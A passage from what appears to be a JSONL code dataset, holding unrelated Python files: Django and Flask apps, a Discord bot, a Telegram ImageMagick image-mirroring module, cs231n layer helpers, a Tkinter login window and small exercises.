Product, Category, Attribute\nimport json\n\nif __name__ == '__main__':\n for product in Product.objects.all():\n try:\n attributes = Attribute.objects.filter(product=product).all()\n \n if(len(attributes) == 1):\n product.attribute_type = 0\n attribute = attributes[0]\n product.price = attribute.price\n product.description = attribute.description\n product.short_description = attribute.short_description\n product.sku = attribute.sku\n product.save()\n attribute.delete()\n \n except:\n #no attributes\n product.attribute_type = 0\n product.save()\n ","sub_path":"MedQuipSite/extra scripts/fix_products_with_one_attribute.py","file_name":"fix_products_with_one_attribute.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"59488032","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /thrift/TMultiplexedProcessor.py\n# Compiled at: 2018-09-11 21:54:05\n# Size of source mod 2**32: 2233 bytes\nfrom thrift.Thrift import TProcessor, TMessageType, TException\nfrom thrift.protocol import TProtocolDecorator, TMultiplexedProtocol\n\nclass TMultiplexedProcessor(TProcessor):\n\n def __init__(self):\n self.services = {}\n\n def registerProcessor(self, serviceName, processor):\n self.services[serviceName] = processor\n\n def process(self, iprot, oprot):\n name, type, seqid = iprot.readMessageBegin()\n if type != TMessageType.CALL:\n if type != TMessageType.ONEWAY:\n raise TException('TMultiplexed protocol only supports CALL & ONEWAY')\n index = name.find(TMultiplexedProtocol.SEPARATOR)\n if index < 0:\n raise TException('Service name not found in message name: ' + name + '. Did you forget to use TMultiplexedProtocol in your client?')\n serviceName = name[0:index]\n call = name[index + len(TMultiplexedProtocol.SEPARATOR):]\n if serviceName not in self.services:\n raise TException('Service name not found: ' + serviceName + '. 
Did you forget to call registerProcessor()?')\n standardMessage = (call, type, seqid)\n return self.services[serviceName].process(StoredMessageProtocol(iprot, standardMessage), oprot)\n\n\nclass StoredMessageProtocol(TProtocolDecorator.TProtocolDecorator):\n\n def __init__(self, protocol, messageBegin):\n self.messageBegin = messageBegin\n\n def readMessageBegin(self):\n return self.messageBegin","sub_path":"pycfiles/thrift_adv-1.0.0.dev0-cp36-cp36m-macosx_10_13_x86_64/TMultiplexedProcessor.cpython-36.opt-1.py","file_name":"TMultiplexedProcessor.cpython-36.opt-1.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118886544","text":"import gntp.notifier\n\ngrowl = gntp.notifier.GrowlNotifier(\n applicationName=\"Notif 0.1a\",\n notifications=[\"New updates\", \"New Messages\"])\n\ngrowl.register()\n\ngrowl.notify(\n noteType=\"New Messages\",\n title=\"Remember to drink Water!\",\n description=\"One cup at a time, towards the good health!\")\n\n","sub_path":"notif/notif.py","file_name":"notif.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"53005434","text":"def highest_even(li):\n evens = []\n for item in li:\n if item % 2 == 0:\n evens.append(item)\n return max(evens)\n\ndef highest_odd(li):\n odds = []\n for item in li:\n if item % 2 == 1:\n odds.append(item)\n return max(odds)\n\nprint(highest_odd([1,2,3,4,5,6,7,8,9,25,33]))\n\nprint(highest_even([1,2,3,4,5,6,7,8,9,25,33]))\n\n\n\n\n","sub_path":"Excercises/highest_even_odd.py","file_name":"highest_even_odd.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"593700055","text":"from django.contrib.auth.models import User, Group\nfrom rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom facerecognition.serializers import UserSerializer, GroupSerializer, PostSerializer, FotoSerializer\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom facerecognition.models import Post, Foto\nfrom rest_framework.parsers import MultiPartParser, FormParser\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n permission_classes = (IsAuthenticated,)\n \nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\nclass PostViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = (IsAdminUser,)\n\nclass FotosViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Foto.objects.all()\n serializer_class = FotoSerializer\n parser_classes = (FormParser, MultiPartParser)\n\n def post(self, request):\n file_obj = request.FILES\n print(file_obj)","sub_path":"facerecognition/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65940526","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom 
flask_sqlalchemy import SQLAlchemy\nimport os\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///example.sqlite'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n# Role class\nclass Events(db.Model):\n\t__tablename__ = \"Events\"\n\tid = db.Column(db.Integer(), primary_key=True)\n\tcampus = db.Column(db.String())\n\tlocation = db.Column(db.String())\n\ttitle = db.Column(db.String())\n\tstart = db.Column(db.String())\n\tend = db.Column(db.String())\n\tdescription = db.Column(db.String())\n\ttags = db.relationship(\"Tags\", cascade=\"all, delete, delete-orphan\")\n\t\nclass Tags(db.Model):\n\tid = db.Column(db.Integer(), primary_key=True)\n\tresultid = db.Column(db.Integer, db.ForeignKey('Events.id'))\n\ttag = db.Column(db.String(255))\ndb.create_all()\n@app.route('/post', methods=['POST'])\ndef post():\n\tcampus=request.form['dropdown']\n\tlocation=request.form['location']\n\ttitle = request.form['title']\n\tstart=request.form['start']\n\tend=request.form['end']\n\tdescription=request.form['description']\n\ttags = request.form.getlist('tags')\n\tevent = Events (campus = campus, location = location, title = title, start = start, end = end, description = description)\n\t\n\tif len(tags) == 0:\n\t\tevent.tags.append(Tags(tag = \"Other\"))\n\tfor tag in tags:\n\t\tevent.tags.append(Tags(tag = tag))\n\tdb.session.add(event)\n\tdb.session.commit()\n\treturn render_template('index.html', events = Events.query.all())\n\t\n@app.route('/api/visitors')\ndef thisstopsitfromcrashingforsomereason():\n content = request.json\n\n@app.route('/addForm')\ndef addForm():\n\treturn render_template('addForm.html')\n\t\n@app.route('/category')\ndef category():\n\treturn render_template('category.html')\n\t\n@app.route('/cal')\ndef cal():\n\treturn render_template('cal.html')\n\n@app.route('/test')\ndef test():\n\treturn render_template('test.html', events = Events.query.all())\n\t\n@app.route('/home')\ndef home():\n\treturn render_template('index.html', events = Events.query.all())\n\t\n@app.route('/')\ndef index():\n\treturn render_template('index.html', events = Events.query.all())\n\t\nport = int(os.getenv('PORT', 8080))\nif __name__ == '__main__':\n\tapp.run(host='localhost', port=port, debug=True)","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253079307","text":"#-*- coding: UTF-8 -*-\r\n\r\n\r\nimport io\r\nimport pycurl\r\nimport logging\r\nfrom logging.handlers import RotatingFileHandler\r\n\r\n\r\nclass MyFilter1(logging.Filter):\r\n def __init__(self, levelname):\r\n self.levelno = {\r\n 'NOTSE': 0,\r\n 'DEBUG': 10,\r\n 'INFO': 20,\r\n 'WARNING': 30,\r\n 'ERROR': 40,\r\n 'CRITICAL': 50,\r\n }[levelname]\r\n\r\n def filter(self, record):\r\n if record.levelno < self.levelno and not record.exc_info:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nclass MyFilter2(logging.Filter):\r\n def filter(self, record):\r\n #if record.levelname == 'ERROR' only record exception\r\n if record.exc_info or record.levelname == 'CRITICAL':\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nformat = logging.Formatter(\"%(levelname)s-%(asctime)s-%(module)s: %(message)s\")\r\n\r\n\r\nnormal_hand = RotatingFileHandler('log/normal.log', maxBytes=2 * 1024 * 1024, backupCount=5)\r\nnormal_hand.setLevel(logging.DEBUG)\r\nmy_filter = 
MyFilter1('CRITICAL')\r\nnormal_hand.addFilter(my_filter)\r\nnormal_hand.setFormatter(format)\r\n\r\n\r\ncrit_hand = logging.FileHandler('log/crit.log')\r\ncrit_hand.setLevel(logging.ERROR)\r\nmy_filter2 = MyFilter2()\r\ncrit_hand.addFilter(my_filter2)\r\ncrit_hand.setFormatter(format)\r\n\r\n\r\ntask_log = logging.getLogger('task')\r\ntask_log.setLevel(logging.DEBUG)\r\ntask_log.addHandler(normal_hand)\r\ntask_log.addHandler(crit_hand)","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146254209","text":"import discord\nimport reply\n\nbot_token = \"\" # Discord Bot Token\n\n# Discord\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n\tprint(\"Logged in as\", client.user.name, client.user.id)\n\n@client.event\nasync def on_message(message):\n\tif ((message.type == discord.MessageType.default) and (client.user != message.author)):\n\t\ttext = message.content\n\t\tprint(message.author.name)\n\t\tres = reply.make_reply(text)\n\t\tchannel = message.channel\n\t\tasync with channel.typing():\n\t\t\tawait channel.send(res)\n\nclient.run(bot_token)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"492270908","text":"import cv2\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nimport os\nimport pickle\nfrom math import *\nimport scipy.misc\nbase = 16\nbias_base = 10\nbias = [log(bias_base+i,3) for i in range(1,540000,18000)]\nexposure_range = 11\n\nset_dir = [\"photo/\" + folders for folders in os.listdir(\"photo\") if os.path.isdir(\"photo/\"+folders) == True]\nk = 2\ndef main():\n for index in range(1,2): #loop for k\n compsum_B = np.zeros((256,256),dtype=\"float64\")\n compsum_G = np.zeros((256,256),dtype=\"float64\")\n compsum_R = np.zeros((256,256),dtype=\"float64\")\n for j in range(len(bias)): #loop for bias\n exposures = [(base+bias[j])*k**i for i in range(exposure_range)]\n \n ki = 2**index\n file_list_g = ['out_{}_{}_G.txt'.format(exposures[i],exposures[i+index]) for i in range(len(exposures)-index)]\n file_list_b = ['out_{}_{}_B.txt'.format(exposures[i],exposures[i+index]) for i in range(len(exposures)-index)]\n file_list_r = ['out_{}_{}_R.txt'.format(exposures[i],exposures[i+index]) for i in range(len(exposures)-index)]\n #temp = [\"tmp/\"]\n #set_dir = temp\n\n count = 1\n for i in set_dir:\n print(\"current folder:{}/{},index: {}/{}, bias: {}/{}\".format(count,len(set_dir),index,3,j+1,len(bias)))\n for fname_b in file_list_b:\n compsum_B += np.loadtxt(os.path.join(i,fname_b))\n for fname_g in file_list_g:\n compsum_G += np.loadtxt(os.path.join(i,fname_g))\n for fname_r in file_list_r:\n compsum_R += np.loadtxt(os.path.join(i,fname_r))\n count+=1\n np.savetxt(\"compsum_B_raw_{}.txt\".format(k**index),compsum_B,fmt=\"%d\")\n np.savetxt(\"compsum_G_raw_{}.txt\".format(k**index),compsum_G,fmt=\"%d\")\n np.savetxt(\"compsum_R_raw_{}.txt\".format(k**index),compsum_R,fmt=\"%d\")\n\n compsum_B[compsum_B>255] = 255\n compsum_G[compsum_G>255] = 255\n compsum_R[compsum_R>255] = 255\n\n scipy.misc.imsave('compsum_B_{}.jpg'.format(k**index),compsum_B)\n scipy.misc.imsave('compsum_G_{}.jpg'.format(k**index),compsum_G)\n scipy.misc.imsave('compsum_R_{}.jpg'.format(k**index),compsum_R)\n\n #sum_B = 
Image.fromarray(np.uint8(compsum_B,mode='L'))\n    #sum_G = Image.fromarray(np.uint8(compsum_G,mode='L'))\n    #sum_R = Image.fromarray(np.uint8(compsum_R,mode='L'))\n\n    #sum_B.save('compsum_B_{}.jpg'.format(k**index))\n    #sum_G.save('compsum_G_{}.jpg'.format(k**index))\n    #sum_R.save('compsum_R_{}.jpg'.format(k**index))\n\nif __name__ == "__main__":\n    main()","sub_path":"ccrf_rework/comparasum.py","file_name":"comparasum.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"59535740","text":"from flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n\n@app.route(\"/turnover/byAgeAndGender\", methods=['GET'])\ndef getTurnoverByAgeAndGender():\n    \"\"\"\n    Accumulated widget: Total turnover & turnovers by age and gender\n    Map: Postal code selection\n\n    Keyword arguments:\n    startMonth - Filtered by the month when the period starts\n    endMonth - Filtered by the month when the period ends\n    postalCode - Filtered by the selected postal code\n    ordered - Results ordered by turnover [ASC, DESC]\n    Return: Total turnover & turnover by age and gender over the period\n    \"\"\"\n    return {\n        \"total\": 0,\n        \"ages\": {\n            \"<=24\": {\n                \"M\": 0,\n                \"F\": 0\n            },\n            \"25-34\": {\n                \"M\": 0,\n                \"F\": 0\n            },\n            \"35-44\": {\n                \"M\": 0,\n                \"F\": 0\n            },\n            \"45-54\": {\n                \"M\": 0,\n                \"F\": 0\n            },\n            \"55-64\": {\n                \"M\": 0,\n                \"F\": 0\n            },\n            \">=65\": {\n                \"M\": 0,\n                \"F\": 0\n            }\n        }\n    }\n\n\n@app.route(\"/turnover/monthlyBy/<field>/\", methods=['GET'])\ndef getMonthlyTurnoverByAgeOrGender(field):\n    \"\"\"\n    Time series widget: Monthly turnover by Age or Gender\n\n    Keyword arguments:\n    field - Attribute which filters the result [age, gender]\n    startMonth - Month when the period starts\n    endMonth - Month when the period ends\n\n    Return: Turnover by age or gender grouped by month over the period\n    \"\"\"\n    byGender = {\n        \"2015-01\": {\n            \"M\": 0,\n            \"F\": 0\n        },\n        \"2015-02\": {\n            \"M\": 0,\n            \"F\": 0\n        },\n        \"2015-03\": {\n            \"M\": 0,\n            \"F\": 0\n        },\n        \"2015-04\": {\n            \"M\": 0,\n            \"F\": 0\n        }\n    }\n    byAge = {\n        \"2015-12\": {\n            \"<=24\": 0,\n            \"25-34\": 0,\n            \"35-44\": 0,\n            \"45-54\": 0,\n            \"55-64\": 0,\n            \">=65\": 0\n        },\n        \"2016-01\": {\n            \"<=24\": 0,\n            \"25-34\": 0,\n            \"35-44\": 0,\n            \"45-54\": 0,\n            \"55-64\": 0,\n            \">=65\": 0\n        },\n        \"2016-02\": {\n            \"<=24\": 0,\n            \"25-34\": 0,\n            \"35-44\": 0,\n            \"45-54\": 0,\n            \"55-64\": 0,\n            \">=65\": 0\n        },\n        \"2016-03\": {\n            \"<=24\": 0,\n            \"25-34\": 0,\n            \"35-44\": 0,\n            \"45-54\": 0,\n            \"55-64\": 0,\n            \">=65\": 0\n        }\n    }\n    return byGender if field == 'gender' else byAge\n\n\nif __name__ == '__main__':\n    app.run(host=\"0.0.0.0\", port=4000, debug=True)\n","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"219521472","text":"from cs231n.layers import *\nfrom cs231n.fast_layers import *\n\n\ndef affineReluForward(x, w, b):\n    \"\"\"\n    Convenience layer that performs an affine transform followed by a ReLU\n\n    Inputs:\n    - x: Input to the affine layer\n    - w, b: Weights for the affine layer\n\n    Returns a tuple of:\n    - out: Output from the ReLU\n    - cache: Object to give to the backward pass\n    \"\"\"\n    a, fcCache = affineForward(x, w, b)\n    out, reluCache = reluForward(a)\n    cache = (fcCache, reluCache)\n    return out, cache\n\n\ndef affineReluBackward(dout, cache):\n    \"\"\"\n    Backward pass for the affine-relu convenience layer\n    \"\"\"\n    fcCache, reluCache = 
cache\n da = reluBackward(dout, reluCache)\n dx, dw, db = affineBackward(da, fcCache)\n return dx, dw, db\n\n\ndef conv_relu_forward(x, w, b, conv_param):\n \"\"\"\n A convenience layer that performs a convolution followed by a ReLU.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n \n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n \"\"\"\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n out, relu_cache = relu_forward(a)\n cache = (conv_cache, relu_cache)\n return out, cache\n\n\ndef conv_relu_backward(dout, cache):\n \"\"\"\n Backward pass for the conv-relu convenience layer.\n \"\"\"\n conv_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dx, dw, db = conv_backward_fast(da, conv_cache)\n return dx, dw, db\n\n\ndef conv_relu_pool_forward(x, w, b, conv_param, pool_param):\n \"\"\"\n Convenience layer that performs a convolution, a ReLU, and a pool.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n - pool_param: Parameters for the pooling layer\n\n Returns a tuple of:\n - out: Output from the pooling layer\n - cache: Object to give to the backward pass\n \"\"\"\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n s, relu_cache = relu_forward(a)\n out, pool_cache = max_pool_forward_fast(s, pool_param)\n cache = (conv_cache, relu_cache, pool_cache)\n return out, cache\n\n\ndef conv_relu_pool_backward(dout, cache):\n \"\"\"\n Backward pass for the conv-relu-pool convenience layer\n \"\"\"\n conv_cache, relu_cache, pool_cache = cache\n ds = max_pool_backward_fast(dout, pool_cache)\n da = relu_backward(ds, relu_cache)\n dx, dw, db = conv_backward_fast(da, conv_cache)\n return dx, dw, db\n\n","sub_path":"2016/Assignment2/cs231n/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"195435062","text":"file = open('node.txt', 'r')\n\nadj = {}\ntop_ten = []\nat_least_3 = 0\n\nfor line in file:\n # Separate the names of the nodes\n data = line.split()\n # Add to the adjacency list\n adj[data[0]] = data[1:]\n if len(data) >= 4:\n # If the node has at least 3 links/edges\n at_least_3 += 1\n\n # Find node with least links in top_ten, replace it\n # with new node if the new node has more links\nfile.close()\nprint(adj)\n\n# Do required stuff with adjacency list here","sub_path":"Stat.py","file_name":"Stat.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"21752292","text":"import binascii\n\n# Some practice and reference for dealing with the conversions in the future\n#\n\n\ninpt = \"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"; # string representation of a hex\n## represents a single int value of the entire hex string\nd = int(inpt,16);\nprint(d);\n\n## hex string to an int then an int to binary\nb = bin (int(inpt,16));\nb = b[2:] # get rid of the 0b representation\nb = b.zfill(4*len(inpt)); # fills in the zeroes from the hex\nprint (b);\n\n# from the binary string to a hex string again\nd2 = hex(d);\nd2 = d2[2:];\nd2 = 
d2.zfill(len(inpt));\nprint(d2);\n\n","sub_path":"old/testconversions.py","file_name":"testconversions.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253717734","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom modules.utils import caption_filter, get_image, send_image\nfrom telegram.ext import CommandHandler, MessageHandler\nfrom telegram import ChatAction\nimport subprocess\nimport datetime\nimport yaml\n\n\ndef handler(dp):\n dp.add_handler(MessageHandler(caption_filter(\"/kek\"), kek))\n dp.add_handler(CommandHandler(\"kek\", kek))\n\n# import path\nwith open(\"config.yml\", \"r\") as f:\n path = yaml.load(f)[\"path\"][\"kek\"]\n\nextensions = (\".jpg\", \".jpeg\", \".png\", \".bmp\", \".webp\")\n\n\n# get image, pass parameter\ndef kek(bot, update):\n if update.message.reply_to_message is not None:\n kek_param = \"\".join(update.message.text[5:7])\n else:\n kek_param = \"\".join(update.message.caption[5:7])\n try:\n extension = get_image(bot, update, path)\n except:\n update.message.reply_text(\"Can't get the image! :(\")\n return\n if extension not in extensions:\n update.message.reply_text(\"Unsupported file, onii-chan!\")\n return False\n update.message.chat.send_action(ChatAction.UPLOAD_PHOTO)\n result = kekify(update, kek_param, extension)\n send_image(update, path, result, extension)\n print(datetime.datetime.now(), \">>>\", \"Done kek\", \">>>\", update.message.from_user.username)\n\n\n# kek process + send\ndef kekify(update, kek_param, extension):\n try:\n if kek_param == \"-l\" or kek_param == \"\":\n crop = \"50%x100% \"\n piece_one = \"result-0\" + extension\n piece_two = \"result-1\" + extension\n flip = \"-flop \"\n order = path + piece_one + \" \" + path + piece_two\n append = \"+append \"\n result = \"kek-left\"\n elif kek_param == \"-r\":\n crop = \"50%x100% \"\n piece_one = \"result-1\" + extension\n piece_two = \"result-0\" + extension\n flip = \"-flop \"\n order = path + piece_two + \" \" + path + piece_one\n append = \"+append \"\n result = \"kek-right\"\n elif kek_param == \"-t\":\n crop = \"100%x50% \"\n piece_one = \"result-0\" + extension\n piece_two = \"result-1\" + extension\n flip = \"-flip \"\n order = path + piece_one + \" \" + path + piece_two\n append = \"-append \"\n result = \"kek-top\"\n elif kek_param == \"-b\":\n crop = \"100%x50% \"\n piece_one = \"result-1\" + extension\n piece_two = \"result-0\" + extension\n flip = \"-flip \"\n order = path + piece_two + \" \" + path + piece_one\n append = \"-append \"\n result = \"kek-bot\"\n elif kek_param == \"-m\":\n result = multikek(update, extension)\n return result\n elif kek_param == \"-v\":\n update.message.reply_text(\"What are you a fucking faggot?\")\n return\n cut = \"convert \" + path + \"original\" + extension + \" -crop \" + crop + path + \"result\" + extension\n subprocess.run(cut, shell=True)\n mirror = \"convert \" + path + piece_one + \" \" + flip + \" \" + path + piece_two\n subprocess.run(mirror, shell=True)\n append = \"convert \" + order + \" \" + append + path + result + extension\n subprocess.run(append, shell=True)\n return result\n except:\n update.message.reply_text(\"Unknown kek parameter.\\nUse -l, -r, -t, -b or -m\")\n return\n\n\ndef multikek(update, extension):\n kekify(update, \"-l\", extension)\n kekify(update, \"-r\", extension)\n kekify(update, \"-t\", extension)\n kekify(update, \"-b\", extension)\n append_lr = \"convert \" + path + \"kek-left\" + extension + \" \" 
+ path + \"kek-right\" + extension + \" +append \" + path + \"kek-lr-temp\" + extension\n    subprocess.run(append_lr, shell=True)\n    append_tb = \"convert \" + path + \"kek-top\" + extension + \" \" + path + \"kek-bot\" + extension + \" +append \" + path + \"kek-tb-temp\" + extension\n    subprocess.run(append_tb, shell=True)\n    append_all = \"convert \" + path + \"kek-lr-temp\" + extension + \" \" + path + \"kek-tb-temp\" + extension + \" -append \" + path + \"multikek\" + extension\n    subprocess.run(append_all, shell=True)\n    result = \"multikek\"\n    return result","sub_path":"modules/kek.py","file_name":"kek.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"575270294","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 26 19:16:32 2020\r\n\r\n@author: morte\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk, font\r\n\r\n\r\n# Geometry manager (grid). Non-resizable window\r\n\r\nclass Aplicacion():\r\n    __ventana=None\r\n    __usuario=None\r\n    __clave=None\r\n    def __init__(self):\r\n        self.__ventana = Tk()\r\n        self.__ventana.title(\"Acceso\")\r\n        \r\n        # Prevents the window size from being changed.\r\n        # The resizable(0,0) method is the short form\r\n        # of resizable(width=False,height=False).\r\n        \r\n        self.__ventana.resizable(0,0)\r\n        fuente = font.Font(weight='bold')\r\n        \r\n        # Defines a 'Frame' widget that will act as the\r\n        # container for the rest of the widgets. The frame is\r\n        # placed in the window 'self.raiz' filling its whole area.\r\n        # The frame is defined with a 2-pixel border, and the\r\n        # 'relief' option with the value 'raised' adds\r\n        # a 3D effect to its border.\r\n        # The 'relief' option accepts the following values:\r\n        # FLAT, RAISED, SUNKEN,\r\n        # GROOVE and RIDGE.\r\n        # The 'padding' option adds extra interior space so\r\n        # the widgets do not sit flush against the frame border.\r\n        \r\n        self.marco = ttk.Frame(self.__ventana, borderwidth=2,\r\n                               relief=\"raised\", padding=(10,10))\r\n        \r\n        # Defines the rest of the widgets; in this case the first\r\n        # parameter indicates they are placed inside the\r\n        # previous frame widget 'self.marco'.\r\n        \r\n        self.usuarioLbl = ttk.Label(self.marco, text=\"Usuario:\",\r\n                                 font=fuente, padding=(5,5))\r\n        self.contraseniaLbl = ttk.Label(self.marco, text=\"Contraseña:\",\r\n                                 font=fuente, padding=(5,5))\r\n        \r\n        # Defines variables for the 'textvariable' options of\r\n        # each 'ttk.Entry()' input box.\r\n        \r\n        self.__usuario = StringVar()\r\n        self.__clave = StringVar()\r\n        self.__usuario.set('')\r\n        self.ctext1 = ttk.Entry(self.marco, textvariable=self.__usuario,\r\n                                width=30)\r\n        self.ctext2 = ttk.Entry(self.marco, textvariable=self.__clave,\r\n                                show=\"*\", width=30)\r\n        self.separ1 = ttk.Separator(self.marco, orient=HORIZONTAL)\r\n        self.boton1 = ttk.Button(self.marco, text=\"Aceptar\", \r\n                                 padding=(5,5), command=self.aceptar)\r\n        self.boton2 = ttk.Button(self.marco, text=\"Cancelar\", \r\n                                 padding=(5,5), command=quit)\r\n        \r\n        # Defines where each widget goes in the grid.\r\n        # This example actually uses two grids:\r\n        # a 1-row x 1-column grid in the window, which\r\n        # holds the Frame, and a 5-row x 3-column grid in\r\n        # the Frame for the rest of the controls.\r\n        # The first row and first column are number 0.\r\n        # The 'column' option gives the column number and the\r\n        # 'row' option gives the row number where a\r\n        # widget is placed.\r\n        # The 'columnspan' option tells the manager that a\r\n        # widget spans a given total number of columns.\r\n        # The entry boxes 'self.ctext1' and 'self.ctext2'\r\n        # span two columns, and the separator bar\r\n        # 'self.separ1' spans three.\r\n        \r\n        self.marco.grid(column=0, row=0)\r\n        self.usuarioLbl.grid(column=0, row=0)\r\n        self.ctext1.grid(column=1, row=0, columnspan=2)\r\n        self.contraseniaLbl.grid(column=0, row=1)\r\n        self.ctext2.grid(column=1, row=1, columnspan=2)\r\n        self.separ1.grid(column=0, row=3, columnspan=3)\r\n        self.boton1.grid(column=1, row=4)\r\n        self.boton2.grid(column=2, row=4)\r\n\r\n        # Sets the focus on the username\r\n        # entry box.\r\n\r\n        self.ctext1.focus_set()\r\n        self.__ventana.mainloop()\r\n    \r\n    def aceptar(self):\r\n        if self.__clave.get() == 'tkinter':\r\n            print(\"Acceso permitido\")\r\n            print(\"Usuario: \", self.ctext1.get())\r\n            print(\"Contraseña:\", self.ctext2.get())\r\n        else:\r\n            print(\"Acceso denegado\")\r\n            self.__clave.set(\"\")\r\n            self.ctext2.focus_set()\r\n\r\ndef testAPP():\r\n    mi_app = Aplicacion()\r\n    return 0\r\n\r\nif __name__ == '__main__':\r\n    testAPP()\r\n","sub_path":"ventanaConGeometriaGrid.py","file_name":"ventanaConGeometriaGrid.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"99468704","text":"from flask import Flask, render_template, request, session, url_for\nfrom flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class\nimport os\nfrom analysis import Distance\n\nfrom flask_dropzone import Dropzone\nfrom flask_sqlalchemy import SQLAlchemy\n\n# Load Model Class\nfrom turi_model import TuriObj\nfrom db_model import DBObj\nimport pandas as pd\nimport sqlite3\n\n# db Config\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///model/mark.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SECRET_KEY'] = 'mark'\n\n# Dropzone settings\napp.config['DROPZONE_UPLOAD_MULTIPLE'] = True\napp.config['DROPZONE_ALLOWED_FILE_CUSTOM'] = True\napp.config['DROPZONE_ALLOWED_FILE_TYPE'] = 'image/*'\napp.config['DROPZONE_REDIRECT_VIEW'] = 'results'\n\n# Uploads settings\napp.config['UPLOADED_PHOTOS_DEST'] = os.getcwd() + '/static/assets/file-upload'\n\n# Activate app\ndropzone = Dropzone(app)\ndb = SQLAlchemy(app)\n\n\n# Connect Upload Router\nphotos = UploadSet('photos', IMAGES)\nconfigure_uploads(app, photos)\npatch_request_class(app)  # set maximum file size, default is 16MB\n\na = TuriObj()\nb = Distance()\nsql_obj = DBObj()\n\n\n@app.route('/')\ndef hello_world():\n    return render_template('basic.html', sql_obj= sql_obj.obj_list, Distance = b)\n\n\n@app.route('/test', methods=['POST', 'GET'])\ndef upload():\n    print('test start')\n    if \"file_urls\" not in session:\n        session['file_urls'] = \"../../static/assets/img/samsung.jpg\"\n    # list to hold our uploaded image urls\n    file_urls = session['file_urls']\n\n    # handle image upload from Dropzone\n    if request.method == 'POST':\n        file_obj = request.files\n        for f in file_obj:\n            file = request.files.get(f)\n\n            # save the file to our photos folder\n            filename = photos.save(\n                file,\n                name=file.filename\n            )\n\n            # append image urls\n            file_urls = photos.url(filename)\n\n        session['file_urls'] = file_urls\n        print('uploading')\n        return \"uploading...\"\n    # return dropzone template on GET request\n    print('test end2')\n    return 
